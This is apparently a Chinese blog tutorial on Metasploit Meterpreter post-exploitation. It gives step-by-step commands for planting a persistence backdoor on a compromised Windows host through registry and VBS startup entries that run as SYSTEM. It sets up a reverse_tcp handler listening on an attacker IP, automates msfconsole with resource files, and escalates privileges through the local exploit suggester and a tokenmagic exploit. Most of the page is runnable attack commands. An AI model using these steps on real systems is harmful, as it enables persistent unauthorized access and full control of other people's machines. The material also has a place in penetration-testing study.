Metapreter实现持续访问,自动化,提权--详细教程

Metapreter 实现持续访问

1.先拿到目标主机的控制权限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同

2.通过options查看需要填写的参数

EXE_NAME 生成后门文件的文件名称(非必要,用默认)

PATH 后门文件的存放路径 (非必要,用默认)

REG_NAME 注册表设置的名称 (非必要,用默认)

SESSION 作用于那个会话

STARTUP 由那个用户来运行这个脚本(一般都写SYSTEM,注:这里必须大写)

VBS_NAME VBS脚本的名称 (非必要,用默认)

set SESSION 8
setg lhost 173.30.1.3

3.执行
exploit


  1. 打开kali监听模块 exploit/multi/handler
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 172.30.1.3
    set lport 7723
    exploit -j -z

-j 加入任务
-z 后台运行

Metapreter自动化

msfconsole -q -r <文件名> 启动时读取文件命令执行实现自动化

cat msfstart.txt

msfconsole -q -r msfstart.txt

这里会自动执行文件中的命令

Metapreter提权

local exploit suggester 模块(本地漏洞利用),用来做提权
search suggester

use 0
options

set session 1
exploit

可以尝试前面绿色的

use exploit exploit/windows/local/tokenmagic
options


set session 1
set LHOST 172.30.1.3
exploit
getuid

提权成功

相关推荐
水云桐程序员7 小时前
电子自动化技术(EDA技术)FPGA概述
运维·fpga开发·自动化
爱浦路 IPLOOK7 小时前
选对UPF网元供应商,解锁5G-A时代行业赋能新可能
运维·网络·数据库
cyber_两只龙宝7 小时前
【Nginx】Nginx反向代理之实现http的反向代理
linux·运维·nginx·http·云原生·反向代理
高光视点7 小时前
2026年App热更新技术选型指南:安全与效率的平衡
运维·人工智能·安全
草莓熊Lotso7 小时前
MySQL 事务管理全解:从 ACID 特性、隔离级别到 MVCC 底层原理
linux·运维·服务器·c语言·数据库·c++·mysql
斯普信云原生组7 小时前
Docker 开源软件应急处理方案及操作手册——Docker 服务启动故障处理
运维·docker·容器
不愿透露姓名的大鹏7 小时前
MySQL InnoDB核心参数深度优化/性能调优
运维·服务器·数据库·mysql
独隅7 小时前
在 Linux 上部署 Keras 模型的全面指南
linux·运维·keras
运维有小邓@7 小时前
如何检测 Active Directory 中的身份与访问风险?
大数据·运维·网络
hanzhuhuaa7 小时前
golang工程部署到docker容器(三)
运维·docker·容器